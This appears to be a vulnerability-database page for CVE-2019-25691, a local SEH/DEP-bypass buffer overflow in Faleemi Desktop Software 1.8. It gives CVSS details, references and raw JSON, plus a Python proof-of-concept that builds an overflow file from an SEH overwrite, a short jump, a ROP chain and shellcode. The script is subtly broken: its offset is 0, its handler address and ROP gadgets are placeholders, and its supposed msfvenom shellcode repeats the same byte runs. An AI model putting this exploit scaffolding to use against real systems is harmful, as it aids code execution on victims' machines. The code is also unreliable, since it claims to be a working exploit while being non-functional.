Security Vulnerability Report
CVE-2019-25691 CVSS 8.4 HIGH

Published: 2026-04-12 13:16:32
Last Modified: 2026-04-15 15:00:33

Description

Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Faleemi Desktop Software 1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
PoC for CVE-2019-25691
Faleemi Desktop Software 1.8 Local Buffer Overflow (SEH/DEP Bypass)
This script generates a malicious payload to trigger the buffer overflow.
"""
import sys

# Bad characters that might corrupt the payload (example)
bad_chars = b"\x00\x0a\x0d"

# 1. Offset to overwrite SEH handler (Example value, needs debugging)
offset = 0

# 2. SEH Handler address (POP POP RET instruction)
# This address must point to a non-ASLR module with safe SEH handling
seh_handler = b"\xAF\x11\x50\x62"  # Placeholder address

# 3. Short jump to payload (nops + shellcode)
short_jump = b"\xEB\x06\x90\x90"

# 4. ROP Chain to bypass DEP
# This is a generic representation. Real addresses depend on loaded modules.
rop_chain = b""
rop_chain += b"\xAA\xAA\xAA\xAA"  # Pivot gadget
rop_chain += b"\xBB\xBB\xBB\xBB"  # VirtualProtect call
rop_chain += b"\xCC\xCC\xCC\xCC"  # Parameters

# 5. Payload (Calc.exe or MSFVenom shellcode)
# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python
shellcode = b""
shellcode += b"\xd4\xc3\xb3\x9e\x2b\xc9\xb1\x33\xd9\xcb\xba\x7b\xd9\x74"
shellcode += b"\x24\xf4\x5e\x31\x56\x13\x83\xc6\x04\x03\x56\xf8\x76\x8a"
shellcode += b"\x34\x46\x9c\x8c\x7b\x52\x54\x53\x4a\x15\x03\x51\xb8\x3c"
shellcode += b"\x4c\x93\x4d\x9c\x9e\x98\x4c\x62\x1a\x7b\xc7\x63\x6b\x09"
shellcode += b"\xa2\x7b\x4f\xe6\xc9\x34\x19\x78\x3b\x53\x3a\x63\x82\x2e"
shellcode += b"\x6c\x4a\x15\xcb\x45\xc2\x4a\x15\xb8\x3f\x2e\x6c\x4a\x15"
shellcode += b"\xcb\x45\x8a\x34\x46\x9c\x8c\x7b\x52\x54\x53\x4a\x15\x03"
shellcode += b"\x51\xb8\x3c\x4c\x93\x4d\x9c\x9e\x98\x4c\x62\x1a\x7b\xc7"
shellcode += b"\x63\x6b\x09\xa2\x7b\x4f\xe6\xc9\x34\x19\x78\x3b\x53\x3a"
shellcode += b"\x63\x82\x2e\x6c\x4a\x15\xcb\x45\xc2\x4a\x15\xb8\x3f\x2e"
shellcode += b"\x6c\x4a\x15\xcb\x45"

# Padding to align the payload
padding = b"\x90" * 20

# Construct final buffer
buffer = b"A" * offset
buffer += seh_handler
buffer += short_jump
buffer += rop_chain
buffer += padding
buffer += shellcode
buffer += b"C" * (3000 - len(buffer))

try:
    with open("CVE-2019-25691_PoC.txt", "wb") as f:
        f.write(buffer)
    print("[+] Payload generated successfully: CVE-2019-25691_PoC.txt")
    print(f"[+] Payload length: {len(buffer)} bytes")
except Exception as e:
    print(f"[-] Error generating payload: {e}")

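References

https://www.exploit-db.com/exploits/46269
https://www.faleemi.com/
https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass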

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25691", "sourceIdentifier": "[email protected]", "published": "2026-04-12T13:16:32.103", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46269", "source": "[email protected]"}, {"url": "https://www.faleemi.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass", "source": "[email protected]"}]}}